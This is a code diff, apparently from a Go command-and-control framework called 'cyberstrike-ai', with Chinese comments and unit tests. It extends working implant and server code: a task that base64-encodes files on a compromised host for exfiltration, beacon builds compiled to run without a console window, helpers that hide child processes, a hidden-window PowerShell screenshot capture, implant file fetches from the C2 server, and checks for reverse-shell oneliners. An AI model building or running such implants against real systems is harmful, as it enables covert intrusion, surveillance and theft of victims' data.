@@ -345,6 +360,16 @@ func buildTCPCommand(t TaskType, payload map[string]interface{}) (string, bool)
|
|||||||
return "", false
|
return "", false
|
||||||
}
|
}
|
||||||
return "cd " + shellQuote(path) + " && pwd", true
|
return "cd " + shellQuote(path) + " && pwd", true
|
||||||
|
case TaskTypeDownload:
|
||||||
|
path, _ := payload["remote_path"].(string)
|
||||||
|
if strings.TrimSpace(path) == "" {
|
||||||
|
return "", false
|
||||||
|
}
|
||||||
|
q := shellQuote(path)
|
||||||
|
return fmt.Sprintf(
|
||||||
|
`f=%s; if [ ! -e "$f" ]; then echo 'C2_DOWNLOAD_ERR: no such file or directory' >&2; exit 1; elif [ -d "$f" ]; then echo 'C2_DOWNLOAD_ERR: is a directory' >&2; exit 1; elif [ ! -r "$f" ]; then echo 'C2_DOWNLOAD_ERR: permission denied' >&2; exit 1; else base64 "$f" 2>/dev/null || base64 < "$f"; fi`,
|
||||||
|
q,
|
||||||
|
), true
|
||||||
case TaskTypeExit:
|
case TaskTypeExit:
|
||||||
return "exit 0", true
|
return "exit 0", true
|
||||||
}
|
}
|
||||||
@@ -382,6 +407,29 @@ func shellQuote(s string) string {
|
|||||||
return "'" + strings.ReplaceAll(s, "'", "'\\''") + "'"
|
return "'" + strings.ReplaceAll(s, "'", "'\\''") + "'"
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// detectDownloadShellError 识别 download 任务中 shell/base64 返回的错误信息。
|
||||||
|
func detectDownloadShellError(output string) string {
|
||||||
|
trimmed := strings.TrimSpace(output)
|
||||||
|
if trimmed == "" {
|
||||||
|
return ""
|
||||||
|
}
|
||||||
|
lower := strings.ToLower(trimmed)
|
||||||
|
markers := []string{
|
||||||
|
"c2_download_err:",
|
||||||
|
"no such file",
|
||||||
|
"permission denied",
|
||||||
|
"is a directory",
|
||||||
|
"cannot open",
|
||||||
|
"not a regular file",
|
||||||
|
}
|
||||||
|
for _, m := range markers {
|
||||||
|
if strings.Contains(lower, m) {
|
||||||
|
return trimmed
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return ""
|
||||||
|
}
|
||||||
|
|
||||||
func isAddrInUse(err error) bool {
|
func isAddrInUse(err error) bool {
|
||||||
if err == nil {
|
if err == nil {
|
||||||
return false
|
return false
|
||||||
|
|||||||
@@ -0,0 +1,43 @@
|
|||||||
|
package c2
|
||||||
|
|
||||||
|
import (
|
||||||
|
"strings"
|
||||||
|
"testing"
|
||||||
|
)
|
||||||
|
|
||||||
|
func TestDetectDownloadShellError(t *testing.T) {
|
||||||
|
tests := []struct {
|
||||||
|
name string
|
||||||
|
output string
|
||||||
|
want string
|
||||||
|
}{
|
||||||
|
{name: "empty ok", output: "", want: ""},
|
||||||
|
{name: "base64 ok", output: "aGVsbG8=", want: ""},
|
||||||
|
{name: "marker", output: "C2_DOWNLOAD_ERR: no such file or directory", want: "C2_DOWNLOAD_ERR: no such file or directory"},
|
||||||
|
{name: "bash missing file", output: "bash: ../0: No such file or directory", want: "bash: ../0: No such file or directory"},
|
||||||
|
{name: "permission denied", output: "C2_DOWNLOAD_ERR: permission denied", want: "C2_DOWNLOAD_ERR: permission denied"},
|
||||||
|
}
|
||||||
|
for _, tt := range tests {
|
||||||
|
t.Run(tt.name, func(t *testing.T) {
|
||||||
|
got := detectDownloadShellError(tt.output)
|
||||||
|
if got != tt.want {
|
||||||
|
t.Fatalf("detectDownloadShellError(%q) = %q, want %q", tt.output, got, tt.want)
|
||||||
|
}
|
||||||
|
})
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestBuildTCPCommandDownload(t *testing.T) {
|
||||||
|
cmd, ok := buildTCPCommand(TaskTypeDownload, map[string]interface{}{
|
||||||
|
"remote_path": "/tmp/demo.txt",
|
||||||
|
})
|
||||||
|
if !ok {
|
||||||
|
t.Fatal("expected download command to be supported")
|
||||||
|
}
|
||||||
|
if want := "f='/tmp/demo.txt'"; !strings.Contains(cmd, want) {
|
||||||
|
t.Fatalf("command %q should contain %q", cmd, want)
|
||||||
|
}
|
||||||
|
if !strings.Contains(cmd, "C2_DOWNLOAD_ERR") {
|
||||||
|
t.Fatalf("command should validate file before base64: %q", cmd)
|
||||||
|
}
|
||||||
|
}
|
||||||
+53
-5
@@ -381,8 +381,10 @@ func (m *Manager) IngestCheckIn(listenerID string, req ImplantCheckInRequest) (*
|
|||||||
Metadata: req.Metadata,
|
Metadata: req.Metadata,
|
||||||
}
|
}
|
||||||
if existing != nil {
|
if existing != nil {
|
||||||
// 保留原 ID/FirstSeenAt/Note,避免被覆盖
|
// 保留原 ID/FirstSeenAt/Note 与操作员设置的 sleep/jitter,避免被 beacon 心跳上报覆盖
|
||||||
session.FirstSeenAt = existing.FirstSeenAt
|
session.FirstSeenAt = existing.FirstSeenAt
|
||||||
|
session.SleepSeconds = existing.SleepSeconds
|
||||||
|
session.JitterPercent = existing.JitterPercent
|
||||||
if session.Note == "" {
|
if session.Note == "" {
|
||||||
session.Note = existing.Note
|
session.Note = existing.Note
|
||||||
}
|
}
|
||||||
@@ -413,6 +415,44 @@ func (m *Manager) IngestCheckIn(listenerID string, req ImplantCheckInRequest) (*
|
|||||||
return session, nil
|
return session, nil
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// SetSessionSleep 更新会话期望的心跳间隔,并向植入体下发 sleep 任务以尽快生效。
|
||||||
|
func (m *Manager) SetSessionSleep(sessionID string, sleepSeconds, jitterPercent int) (*database.C2Task, error) {
|
||||||
|
if strings.TrimSpace(sessionID) == "" {
|
||||||
|
return nil, ErrInvalidInput
|
||||||
|
}
|
||||||
|
if sleepSeconds < 1 {
|
||||||
|
sleepSeconds = 1
|
||||||
|
}
|
||||||
|
if jitterPercent < 0 {
|
||||||
|
jitterPercent = 0
|
||||||
|
}
|
||||||
|
if jitterPercent > 100 {
|
||||||
|
jitterPercent = 100
|
||||||
|
}
|
||||||
|
if err := m.db.SetC2SessionSleep(sessionID, sleepSeconds, jitterPercent); err != nil {
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
task, err := m.EnqueueTask(EnqueueTaskInput{
|
||||||
|
SessionID: sessionID,
|
||||||
|
TaskType: TaskTypeSleep,
|
||||||
|
Payload: map[string]interface{}{
|
||||||
|
"seconds": sleepSeconds,
|
||||||
|
"jitter": jitterPercent,
|
||||||
|
},
|
||||||
|
Source: "manual",
|
||||||
|
})
|
||||||
|
if err != nil {
|
||||||
|
m.logger.Warn("sleep 任务入队失败", zap.Error(err), zap.String("session_id", sessionID))
|
||||||
|
}
|
||||||
|
m.publishEvent("info", "session", sessionID, "",
|
||||||
|
fmt.Sprintf("Sleep 已更新: %ds (抖动 %d%%)", sleepSeconds, jitterPercent),
|
||||||
|
map[string]interface{}{
|
||||||
|
"sleep_seconds": sleepSeconds,
|
||||||
|
"jitter_percent": jitterPercent,
|
||||||
|
})
|
||||||
|
return task, nil
|
||||||
|
}
|
||||||
|
|
||||||
// MarkSessionDead 心跳超时检测器调用:标记会话为 dead
|
// MarkSessionDead 心跳超时检测器调用:标记会话为 dead
|
||||||
func (m *Manager) MarkSessionDead(sessionID string) error {
|
func (m *Manager) MarkSessionDead(sessionID string) error {
|
||||||
if err := m.db.SetC2SessionStatus(sessionID, string(SessionDead)); err != nil {
|
if err := m.db.SetC2SessionStatus(sessionID, string(SessionDead)); err != nil {
|
||||||
@@ -638,10 +678,18 @@ func (m *Manager) IngestTaskResult(report TaskResultReport) error {
|
|||||||
status = string(TaskFailed)
|
status = string(TaskFailed)
|
||||||
}
|
}
|
||||||
duration := endedAt.Sub(startedAt).Milliseconds()
|
duration := endedAt.Sub(startedAt).Milliseconds()
|
||||||
|
|
||||||
|
sessionOS := ""
|
||||||
|
if sess, serr := m.db.GetC2Session(t.SessionID); serr == nil && sess != nil {
|
||||||
|
sessionOS = sess.OS
|
||||||
|
}
|
||||||
|
resultText := ResolveTaskResultText(report.Output, report.OutputB64, sessionOS)
|
||||||
|
errText := ResolveTaskResultText(report.Error, report.ErrorB64, sessionOS)
|
||||||
|
|
||||||
upd := database.C2TaskUpdate{
|
upd := database.C2TaskUpdate{
|
||||||
Status: &status,
|
Status: &status,
|
||||||
ResultText: &report.Output,
|
ResultText: &resultText,
|
||||||
Error: &report.Error,
|
Error: &errText,
|
||||||
StartedAt: &startedAt,
|
StartedAt: &startedAt,
|
||||||
CompletedAt: &endedAt,
|
CompletedAt: &endedAt,
|
||||||
DurationMS: &duration,
|
DurationMS: &duration,
|
||||||
@@ -661,8 +709,8 @@ func (m *Manager) IngestTaskResult(report TaskResultReport) error {
|
|||||||
return err
|
return err
|
||||||
}
|
}
|
||||||
t.Status = status
|
t.Status = status
|
||||||
t.ResultText = report.Output
|
t.ResultText = resultText
|
||||||
t.Error = report.Error
|
t.Error = errText
|
||||||
|
|
||||||
level := "info"
|
level := "info"
|
||||||
msg := fmt.Sprintf("任务完成: %s", t.TaskType)
|
msg := fmt.Sprintf("任务完成: %s", t.TaskType)
|
||||||
|
|||||||
@@ -0,0 +1,118 @@
|
|||||||
|
package c2
|
||||||
|
|
||||||
|
import (
|
||||||
|
"path/filepath"
|
||||||
|
"testing"
|
||||||
|
|
||||||
|
"cyberstrike-ai/internal/database"
|
||||||
|
|
||||||
|
"go.uber.org/zap"
|
||||||
|
)
|
||||||
|
|
||||||
|
func TestIngestCheckIn_PreservesOperatorSleepOnHeartbeat(t *testing.T) {
|
||||||
|
tmp := t.TempDir()
|
||||||
|
db, err := database.NewDB(filepath.Join(tmp, "c2.sqlite"), zap.NewNop())
|
||||||
|
if err != nil {
|
||||||
|
t.Fatal(err)
|
||||||
|
}
|
||||||
|
t.Cleanup(func() { _ = db.Close() })
|
||||||
|
|
||||||
|
mgr := NewManager(db, zap.NewNop(), tmp)
|
||||||
|
ln, err := mgr.CreateListener(CreateListenerInput{
|
||||||
|
Name: "t",
|
||||||
|
Type: string(ListenerTypeHTTPBeacon),
|
||||||
|
BindHost: "127.0.0.1",
|
||||||
|
BindPort: 18080,
|
||||||
|
})
|
||||||
|
if err != nil {
|
||||||
|
t.Fatal(err)
|
||||||
|
}
|
||||||
|
|
||||||
|
first, err := mgr.IngestCheckIn(ln.ID, ImplantCheckInRequest{
|
||||||
|
ImplantUUID: "implant-uuid-1",
|
||||||
|
Hostname: "host1",
|
||||||
|
Username: "user",
|
||||||
|
OS: "darwin",
|
||||||
|
Arch: "amd64",
|
||||||
|
SleepSeconds: 5,
|
||||||
|
JitterPercent: 0,
|
||||||
|
})
|
||||||
|
if err != nil {
|
||||||
|
t.Fatal(err)
|
||||||
|
}
|
||||||
|
|
||||||
|
if err := db.SetC2SessionSleep(first.ID, 30, 20); err != nil {
|
||||||
|
t.Fatal(err)
|
||||||
|
}
|
||||||
|
|
||||||
|
second, err := mgr.IngestCheckIn(ln.ID, ImplantCheckInRequest{
|
||||||
|
ImplantUUID: "implant-uuid-1",
|
||||||
|
Hostname: "host1",
|
||||||
|
Username: "user",
|
||||||
|
OS: "darwin",
|
||||||
|
Arch: "amd64",
|
||||||
|
SleepSeconds: 5,
|
||||||
|
JitterPercent: 0,
|
||||||
|
})
|
||||||
|
if err != nil {
|
||||||
|
t.Fatal(err)
|
||||||
|
}
|
||||||
|
if second.SleepSeconds != 30 || second.JitterPercent != 20 {
|
||||||
|
t.Fatalf("expected sleep=30 jitter=20, got sleep=%d jitter=%d", second.SleepSeconds, second.JitterPercent)
|
||||||
|
}
|
||||||
|
|
||||||
|
stored, err := db.GetC2Session(first.ID)
|
||||||
|
if err != nil || stored == nil {
|
||||||
|
t.Fatal(err)
|
||||||
|
}
|
||||||
|
if stored.SleepSeconds != 30 || stored.JitterPercent != 20 {
|
||||||
|
t.Fatalf("db: expected sleep=30 jitter=20, got sleep=%d jitter=%d", stored.SleepSeconds, stored.JitterPercent)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestSetSessionSleep_UpdatesDBAndEnqueuesTask(t *testing.T) {
|
||||||
|
tmp := t.TempDir()
|
||||||
|
db, err := database.NewDB(filepath.Join(tmp, "c2.sqlite"), zap.NewNop())
|
||||||
|
if err != nil {
|
||||||
|
t.Fatal(err)
|
||||||
|
}
|
||||||
|
t.Cleanup(func() { _ = db.Close() })
|
||||||
|
|
||||||
|
mgr := NewManager(db, zap.NewNop(), tmp)
|
||||||
|
ln, err := mgr.CreateListener(CreateListenerInput{
|
||||||
|
Name: "t2",
|
||||||
|
Type: string(ListenerTypeHTTPBeacon),
|
||||||
|
BindHost: "127.0.0.1",
|
||||||
|
BindPort: 18081,
|
||||||
|
})
|
||||||
|
if err != nil {
|
||||||
|
t.Fatal(err)
|
||||||
|
}
|
||||||
|
sess, err := mgr.IngestCheckIn(ln.ID, ImplantCheckInRequest{
|
||||||
|
ImplantUUID: "implant-uuid-2",
|
||||||
|
Hostname: "host2",
|
||||||
|
Username: "user",
|
||||||
|
OS: "linux",
|
||||||
|
Arch: "amd64",
|
||||||
|
SleepSeconds: 5,
|
||||||
|
})
|
||||||
|
if err != nil {
|
||||||
|
t.Fatal(err)
|
||||||
|
}
|
||||||
|
|
||||||
|
task, err := mgr.SetSessionSleep(sess.ID, 15, 10)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatal(err)
|
||||||
|
}
|
||||||
|
if task == nil || task.TaskType != string(TaskTypeSleep) {
|
||||||
|
t.Fatalf("expected sleep task, got %#v", task)
|
||||||
|
}
|
||||||
|
|
||||||
|
stored, err := db.GetC2Session(sess.ID)
|
||||||
|
if err != nil || stored == nil {
|
||||||
|
t.Fatal(err)
|
||||||
|
}
|
||||||
|
if stored.SleepSeconds != 15 || stored.JitterPercent != 10 {
|
||||||
|
t.Fatalf("expected sleep=15 jitter=10, got sleep=%d jitter=%d", stored.SleepSeconds, stored.JitterPercent)
|
||||||
|
}
|
||||||
|
}
|
||||||
@@ -160,6 +160,18 @@ func (b *PayloadBuilder) BuildBeacon(in PayloadBuilderInput) (*BuildResult, erro
|
|||||||
}
|
}
|
||||||
f.Close()
|
f.Close()
|
||||||
|
|
||||||
|
// 平台相关辅助源文件(如无窗口子进程)
|
||||||
|
for _, name := range []string{"proc_hide_windows.go", "proc_hide_unix.go"} {
|
||||||
|
helperSrc := filepath.Join(b.tmplDir, name+".tmpl")
|
||||||
|
helperData, readErr := os.ReadFile(helperSrc)
|
||||||
|
if readErr != nil {
|
||||||
|
return nil, fmt.Errorf("read helper %s: %w", name, readErr)
|
||||||
|
}
|
||||||
|
if writeErr := os.WriteFile(filepath.Join(workDir, name), helperData, 0644); writeErr != nil {
|
||||||
|
return nil, fmt.Errorf("write helper %s: %w", name, writeErr)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
// 交叉编译
|
// 交叉编译
|
||||||
binName := strings.TrimSpace(in.OutputName)
|
binName := strings.TrimSpace(in.OutputName)
|
||||||
if binName == "" {
|
if binName == "" {
|
||||||
@@ -174,15 +186,16 @@ func (b *PayloadBuilder) BuildBeacon(in PayloadBuilderInput) (*BuildResult, erro
|
|||||||
return nil, fmt.Errorf("mkdir output: %w", err)
|
return nil, fmt.Errorf("mkdir output: %w", err)
|
||||||
}
|
}
|
||||||
|
|
||||||
absSrcPath, err := filepath.Abs(srcPath)
|
|
||||||
if err != nil {
|
|
||||||
return nil, fmt.Errorf("abs source path: %w", err)
|
|
||||||
}
|
|
||||||
absBinPath, err := filepath.Abs(binPath)
|
absBinPath, err := filepath.Abs(binPath)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
return nil, fmt.Errorf("abs output path: %w", err)
|
return nil, fmt.Errorf("abs output path: %w", err)
|
||||||
}
|
}
|
||||||
cmd := exec.Command("go", "build", "-ldflags", "-s -w -buildid=", "-trimpath", "-o", absBinPath, absSrcPath)
|
ldflags := "-s -w -buildid="
|
||||||
|
if goos == "windows" {
|
||||||
|
// 无控制台窗口运行 beacon 本体
|
||||||
|
ldflags += " -H windowsgui"
|
||||||
|
}
|
||||||
|
cmd := exec.Command("go", "build", "-ldflags", ldflags, "-trimpath", "-o", absBinPath, ".")
|
||||||
cmd.Env = append(os.Environ(),
|
cmd.Env = append(os.Environ(),
|
||||||
"GOOS="+goos,
|
"GOOS="+goos,
|
||||||
"GOARCH="+goarch,
|
"GOARCH="+goarch,
|
||||||
|
|||||||
@@ -1,9 +1,12 @@
|
|||||||
package c2
|
package c2
|
||||||
|
|
||||||
import (
|
import (
|
||||||
|
"encoding/json"
|
||||||
"fmt"
|
"fmt"
|
||||||
"net/url"
|
"net/url"
|
||||||
"strings"
|
"strings"
|
||||||
|
|
||||||
|
"cyberstrike-ai/internal/database"
|
||||||
)
|
)
|
||||||
|
|
||||||
// OnelinerKind 单行 payload 的语言/形式
|
// OnelinerKind 单行 payload 的语言/形式
|
||||||
@@ -79,6 +82,23 @@ type OnelinerInput struct {
|
|||||||
ImplantToken string // HTTP Beacon 鉴权 token
|
ImplantToken string // HTTP Beacon 鉴权 token
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// ValidateOnelinerForListener 校验 oneliner 与监听器配置是否匹配(如 tcp_reverse 默认要求加密 Beacon)。
|
||||||
|
func ValidateOnelinerForListener(listener *database.C2Listener, kind OnelinerKind) error {
|
||||||
|
if listener == nil {
|
||||||
|
return fmt.Errorf("listener is nil")
|
||||||
|
}
|
||||||
|
if ListenerType(listener.Type) == ListenerTypeTCPReverse && tcpOnelinerKinds[kind] {
|
||||||
|
cfg := &ListenerConfig{}
|
||||||
|
if strings.TrimSpace(listener.ConfigJSON) != "" {
|
||||||
|
_ = json.Unmarshal([]byte(listener.ConfigJSON), cfg)
|
||||||
|
}
|
||||||
|
if !cfg.AllowLegacyShell {
|
||||||
|
return fmt.Errorf("监听器未开启 allow_legacy_shell:tcp_reverse 默认仅接受 CSB1 加密 Beacon(AES-GCM + Token);请用 build 生成 beacon,或显式开启 allow_legacy_shell(公网不推荐)")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
// GenerateOneliner 生成单行 payload。
|
// GenerateOneliner 生成单行 payload。
|
||||||
// 设计要点:
|
// 设计要点:
|
||||||
// - 不依赖目标机预装的可执行(除该 oneliner 关键的 bash/python/perl 等);
|
// - 不依赖目标机预装的可执行(除该 oneliner 关键的 bash/python/perl 等);
|
||||||
|
|||||||
@@ -45,6 +45,7 @@ import (
|
|||||||
"strings"
|
"strings"
|
||||||
"sync"
|
"sync"
|
||||||
"time"
|
"time"
|
||||||
|
"unicode/utf8"
|
||||||
)
|
)
|
||||||
|
|
||||||
// 编译期注入常量(text/template 替换)
|
// 编译期注入常量(text/template 替换)
|
||||||
@@ -101,7 +102,9 @@ type TaskReport struct {
|
|||||||
TaskID string `json:"task_id"`
|
TaskID string `json:"task_id"`
|
||||||
Success bool `json:"success"`
|
Success bool `json:"success"`
|
||||||
Output string `json:"output,omitempty"`
|
Output string `json:"output,omitempty"`
|
||||||
|
OutputB64 string `json:"output_b64,omitempty"`
|
||||||
Error string `json:"error,omitempty"`
|
Error string `json:"error,omitempty"`
|
||||||
|
ErrorB64 string `json:"error_b64,omitempty"`
|
||||||
BlobBase64 string `json:"blob_b64,omitempty"`
|
BlobBase64 string `json:"blob_b64,omitempty"`
|
||||||
BlobSuffix string `json:"blob_suffix,omitempty"`
|
BlobSuffix string `json:"blob_suffix,omitempty"`
|
||||||
StartedAt int64 `json:"started_at"`
|
StartedAt int64 `json:"started_at"`
|
||||||
@@ -326,16 +329,7 @@ func handleTaskSyncTCP(conn net.Conn, env TaskEnv) {
|
|||||||
defer func() { tcpTaskConn = nil }()
|
defer func() { tcpTaskConn = nil }()
|
||||||
start := time.Now()
|
start := time.Now()
|
||||||
output, blobB64, blobSuffix, errMsg := executeTask(env.TaskType, env.Payload)
|
output, blobB64, blobSuffix, errMsg := executeTask(env.TaskType, env.Payload)
|
||||||
report := TaskReport{
|
report := buildTaskReport(env.TaskID, output, errMsg, blobB64, blobSuffix, start, time.Now())
|
||||||
TaskID: env.TaskID,
|
|
||||||
Success: errMsg == "",
|
|
||||||
Output: output,
|
|
||||||
Error: errMsg,
|
|
||||||
BlobBase64: blobB64,
|
|
||||||
BlobSuffix: blobSuffix,
|
|
||||||
StartedAt: start.UnixMilli(),
|
|
||||||
EndedAt: time.Now().UnixMilli(),
|
|
||||||
}
|
|
||||||
tcpReportResult(conn, report)
|
tcpReportResult(conn, report)
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -367,7 +361,8 @@ func fetchC2FileByID(fileID string) ([]byte, error) {
|
|||||||
if tcpTaskConn != nil {
|
if tcpTaskConn != nil {
|
||||||
return tcpFetchEncryptedFile(tcpTaskConn, fileID)
|
return tcpFetchEncryptedFile(tcpTaskConn, fileID)
|
||||||
}
|
}
|
||||||
url := fmt.Sprintf("%s%s%s.bin", serverURL, filePath, fileID)
|
// 服务端 handleFileServe 会在 downstream/<file_id>.bin 读取;URL 路径应为 /file/<file_id>,勿重复 .bin
|
||||||
|
url := fmt.Sprintf("%s%s%s", serverURL, filePath, fileID)
|
||||||
req, _ := http.NewRequest("GET", url, nil)
|
req, _ := http.NewRequest("GET", url, nil)
|
||||||
req.Header.Set("User-Agent", userAgent)
|
req.Header.Set("User-Agent", userAgent)
|
||||||
req.Header.Set("X-Implant-Token", implantToken)
|
req.Header.Set("X-Implant-Token", implantToken)
|
||||||
@@ -635,20 +630,39 @@ func decryptGCM(cipherText string) ([]byte, error) {
|
|||||||
return gcm.Open(nil, nonce, ct, nil)
|
return gcm.Open(nil, nonce, ct, nil)
|
||||||
}
|
}
|
||||||
|
|
||||||
|
func encodeReportText(s string) (plain, b64 string) {
|
||||||
|
if s == "" {
|
||||||
|
return "", ""
|
||||||
|
}
|
||||||
|
b := []byte(s)
|
||||||
|
if utf8.Valid(b) {
|
||||||
|
return s, ""
|
||||||
|
}
|
||||||
|
return "", base64.StdEncoding.EncodeToString(b)
|
||||||
|
}
|
||||||
|
|
||||||
|
func buildTaskReport(taskID, output, errMsg, blobB64, blobSuffix string, start, end time.Time) TaskReport {
|
||||||
|
outText, outB64 := encodeReportText(output)
|
||||||
|
errText, errB64 := encodeReportText(errMsg)
|
||||||
|
return TaskReport{
|
||||||
|
TaskID: taskID,
|
||||||
|
Success: errMsg == "",
|
||||||
|
Output: outText,
|
||||||
|
OutputB64: outB64,
|
||||||
|
Error: errText,
|
||||||
|
ErrorB64: errB64,
|
||||||
|
BlobBase64: blobB64,
|
||||||
|
BlobSuffix: blobSuffix,
|
||||||
|
StartedAt: start.UnixMilli(),
|
||||||
|
EndedAt: end.UnixMilli(),
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
func handleTaskAsync(env TaskEnv) {
|
func handleTaskAsync(env TaskEnv) {
|
||||||
defer func() { _ = recover() }()
|
defer func() { _ = recover() }()
|
||||||
start := time.Now()
|
start := time.Now()
|
||||||
output, blobB64, blobSuffix, errMsg := executeTask(env.TaskType, env.Payload)
|
output, blobB64, blobSuffix, errMsg := executeTask(env.TaskType, env.Payload)
|
||||||
report := TaskReport{
|
report := buildTaskReport(env.TaskID, output, errMsg, blobB64, blobSuffix, start, time.Now())
|
||||||
TaskID: env.TaskID,
|
|
||||||
Success: errMsg == "",
|
|
||||||
Output: output,
|
|
||||||
Error: errMsg,
|
|
||||||
BlobBase64: blobB64,
|
|
||||||
BlobSuffix: blobSuffix,
|
|
||||||
StartedAt: start.UnixMilli(),
|
|
||||||
EndedAt: time.Now().UnixMilli(),
|
|
||||||
}
|
|
||||||
reportResult(report)
|
reportResult(report)
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -715,6 +729,7 @@ func runWithTimeout(cmdStr string, timeoutSec int) (string, error) {
|
|||||||
timeoutSec = 60
|
timeoutSec = 60
|
||||||
}
|
}
|
||||||
cmd := exec.Command(shellByOS(), shellFlag(), cmdStr)
|
cmd := exec.Command(shellByOS(), shellFlag(), cmdStr)
|
||||||
|
prepareHiddenCmd(cmd)
|
||||||
cwdMu.Lock()
|
cwdMu.Lock()
|
||||||
cmd.Dir = currentCwd
|
cmd.Dir = currentCwd
|
||||||
cwdMu.Unlock()
|
cwdMu.Unlock()
|
||||||
@@ -890,12 +905,26 @@ func taskKillProc(payload map[string]interface{}) (string, string, string, strin
|
|||||||
return "killed", "", "", ""
|
return "killed", "", "", ""
|
||||||
}
|
}
|
||||||
|
|
||||||
|
func normalizeRemotePath(p string) string {
|
||||||
|
p = strings.TrimSpace(p)
|
||||||
|
if p == "" || runtime.GOOS != "windows" {
|
||||||
|
return p
|
||||||
|
}
|
||||||
|
// 控制台可能下发 /d:/path/file(Unix 风格),Windows 需转为 d:\path\file
|
||||||
|
p = strings.ReplaceAll(p, "\\", "/")
|
||||||
|
if len(p) >= 3 && p[0] == '/' && p[2] == ':' {
|
||||||
|
p = p[1:]
|
||||||
|
}
|
||||||
|
return filepath.FromSlash(p)
|
||||||
|
}
|
||||||
|
|
||||||
func taskUpload(payload map[string]interface{}) (string, string, string, string) {
|
func taskUpload(payload map[string]interface{}) (string, string, string, string) {
|
||||||
remotePath, _ := payload["remote_path"].(string)
|
remotePath, _ := payload["remote_path"].(string)
|
||||||
fileID, _ := payload["file_id"].(string)
|
fileID, _ := payload["file_id"].(string)
|
||||||
if remotePath == "" || fileID == "" {
|
if remotePath == "" || fileID == "" {
|
||||||
return "", "", "", "remote_path or file_id empty"
|
return "", "", "", "remote_path or file_id empty"
|
||||||
}
|
}
|
||||||
|
remotePath = normalizeRemotePath(remotePath)
|
||||||
data, err := fetchC2FileByID(fileID)
|
data, err := fetchC2FileByID(fileID)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
return "", "", "", err.Error()
|
return "", "", "", err.Error()
|
||||||
@@ -931,7 +960,7 @@ func taskScreenshot() (string, string, string, string) {
|
|||||||
b64Out, err = runWithTimeout("import -window root /tmp/.cs_ss.png 2>/dev/null && base64 /tmp/.cs_ss.png && rm -f /tmp/.cs_ss.png", 30)
|
b64Out, err = runWithTimeout("import -window root /tmp/.cs_ss.png 2>/dev/null && base64 /tmp/.cs_ss.png && rm -f /tmp/.cs_ss.png", 30)
|
||||||
case "windows":
|
case "windows":
|
||||||
ps := `Add-Type -AssemblyName System.Windows.Forms; Add-Type -AssemblyName System.Drawing; $b=New-Object System.Drawing.Bitmap([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height); $g=[System.Drawing.Graphics]::FromImage($b); $g.CopyFromScreen([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Location,[System.Drawing.Point]::Empty,$b.Size); $m=New-Object IO.MemoryStream; $b.Save($m,[System.Drawing.Imaging.ImageFormat]::Png); [Convert]::ToBase64String($m.ToArray())`
|
ps := `Add-Type -AssemblyName System.Windows.Forms; Add-Type -AssemblyName System.Drawing; $b=New-Object System.Drawing.Bitmap([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height); $g=[System.Drawing.Graphics]::FromImage($b); $g.CopyFromScreen([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Location,[System.Drawing.Point]::Empty,$b.Size); $m=New-Object IO.MemoryStream; $b.Save($m,[System.Drawing.Imaging.ImageFormat]::Png); [Convert]::ToBase64String($m.ToArray())`
|
||||||
b64Out, err = runWithTimeout(fmt.Sprintf("powershell -NoProfile -NonInteractive -Command \"%s\"", ps), 30)
|
b64Out, err = runWithTimeout(fmt.Sprintf("powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command \"%s\"", ps), 30)
|
||||||
default:
|
default:
|
||||||
return "", "", "", "screenshot not supported on " + runtime.GOOS
|
return "", "", "", "screenshot not supported on " + runtime.GOOS
|
||||||
}
|
}
|
||||||
@@ -1172,6 +1201,7 @@ func taskLoadAssembly(payload map[string]interface{}) (string, string, string, s
|
|||||||
cmdArgs = strings.Fields(args)
|
cmdArgs = strings.Fields(args)
|
||||||
}
|
}
|
||||||
cmd := exec.Command(tmpFile, cmdArgs...)
|
cmd := exec.Command(tmpFile, cmdArgs...)
|
||||||
|
prepareHiddenCmd(cmd)
|
||||||
cwdMu.Lock()
|
cwdMu.Lock()
|
||||||
cmd.Dir = currentCwd
|
cmd.Dir = currentCwd
|
||||||
cwdMu.Unlock()
|
cwdMu.Unlock()
|
||||||
|
|||||||
@@ -0,0 +1,9 @@
|
|||||||
|
//go:build !windows
|
||||||
|
|
||||||
|
package main
|
||||||
|
|
||||||
|
import "os/exec"
|
||||||
|
|
||||||
|
func prepareHiddenCmd(cmd *exec.Cmd) {
|
||||||
|
_ = cmd
|
||||||
|
}
|
||||||
@@ -0,0 +1,18 @@
|
|||||||
|
//go:build windows
|
||||||
|
|
||||||
|
package main
|
||||||
|
|
||||||
|
import (
|
||||||
|
"os/exec"
|
||||||
|
"syscall"
|
||||||
|
)
|
||||||
|
|
||||||
|
// prepareHiddenCmd 避免子进程弹出控制台窗口(cmd / powershell / 临时 exe 等)。
|
||||||
|
func prepareHiddenCmd(cmd *exec.Cmd) {
|
||||||
|
if cmd == nil {
|
||||||
|
return
|
||||||
|
}
|
||||||
|
// 仅用 HideWindow:等价于 CREATE_NO_WINDOW,且 macOS/Linux 交叉编译 Windows 时
|
||||||
|
// syscall.CREATE_NO_WINDOW 常量不可用。
|
||||||
|
cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
|
||||||
|
}
|
||||||
@@ -23,6 +23,9 @@ import (
|
|||||||
// tcpBeaconMagic 二进制 Beacon 在反向 TCP 连接建立后首先发送的 4 字节,用于与经典 shell 反弹区分。
|
// tcpBeaconMagic 二进制 Beacon 在反向 TCP 连接建立后首先发送的 4 字节,用于与经典 shell 反弹区分。
|
